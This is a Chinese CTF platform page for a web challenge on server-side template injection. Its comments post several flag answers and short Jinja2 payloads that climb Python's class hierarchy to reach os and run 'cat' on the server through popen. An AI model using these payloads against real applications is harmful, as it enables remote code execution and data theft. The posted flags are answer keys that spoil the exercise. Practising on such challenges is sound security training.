Simple_SSTI_2WEB 未解决

分数: 10 金币: 3
题目作者: valecalida
一  血: Tokeii
一血奖励: 3金币
解  决: 15815
提  示:
描  述:
Simple_SSTI_2
...
登录回复
评论
毛睿战士 2年前
举报

flag{33efc8e81726279e0e6b91ecaea42317}

回复 0
主旋律世界 2年前
举报

flag{9441f6d8b716264782c92c201c32f1c7}

回复 0
2734533437 2年前
举报

flag{9441f6d8b716264782c92c201c32f1c7}

回复 0
只因你太美 2年前
举报

flag{723443c44c7fa1574af9d291248a1d6d}

回复 0
WilliamTao 2年前
举报

flag{10bfab153a960093403c805acc48e1ee}

回复 0
maq19 2年前
举报

模板注入: flag{07fcf9e36ba0522ae52e1945047a4202}

回复 0
SecI302 2年前
举报

寻找可引用的类"".__class__.__mro__[1].__subclasses__()然后查找os相关能执行命令的类=>os之类的然后通过BurpSuite遍历序号[231-235,262,264-396]得到可用的类最后cat flag即可

回复 0
SecI302 2年前
举报

寻找可引用的类"".__class__.__mro__[1].__subclasses__()然后查找os相关能执行命令的类=>os之类的然后通过BurpSuite遍历序号[231-235,262,264-396]得到可用的类最后cat flag即可

回复 0
⎝ZJJARY 2年前
举报

①{{[].__class__.__base__.__subclasses__()}}查看所有类,并找到warnings.catch_warnings类,逐个计数或者写脚本得到序号为177 ②{{[].__class__.__base__.__subclasses__()[177].__init__.__globals__['__builtins__']['__imp'+'ort__']('os

回复 2
g0207l0706 2年前
举报

?flag={{%20config.__class__.__init__.__globals__[%27os%27].popen(%27cat%20../app/flag%27).read()%20}}

回复 1

WriteUp

image
valecalida

5 金币

立即查看

评分(15)

解题动态

YameMres 攻破了该题 23小时前
yixcjy 攻破了该题 3天前
DURUI 攻破了该题 3天前
零号酒仓 攻破了该题 3天前
besty2k 攻破了该题 4天前
zttyzz 攻破了该题 4天前
12334 攻破了该题 4天前
PY222 攻破了该题 4天前
魔刀千刃 攻破了该题 4天前
我是CTF大王 攻破了该题 4天前
16671766779 攻破了该题 5天前
海宝宝哈哈 攻破了该题 5天前
遇见遇见 攻破了该题 5天前
th0528 攻破了该题 6天前
/ 攻破了该题 6天前
15195388189 攻破了该题 6天前
18185185996 攻破了该题 11天前
KKsama 攻破了该题 11天前
zhuguangsen 攻破了该题 11天前
5013230204 攻破了该题 13天前
问题反馈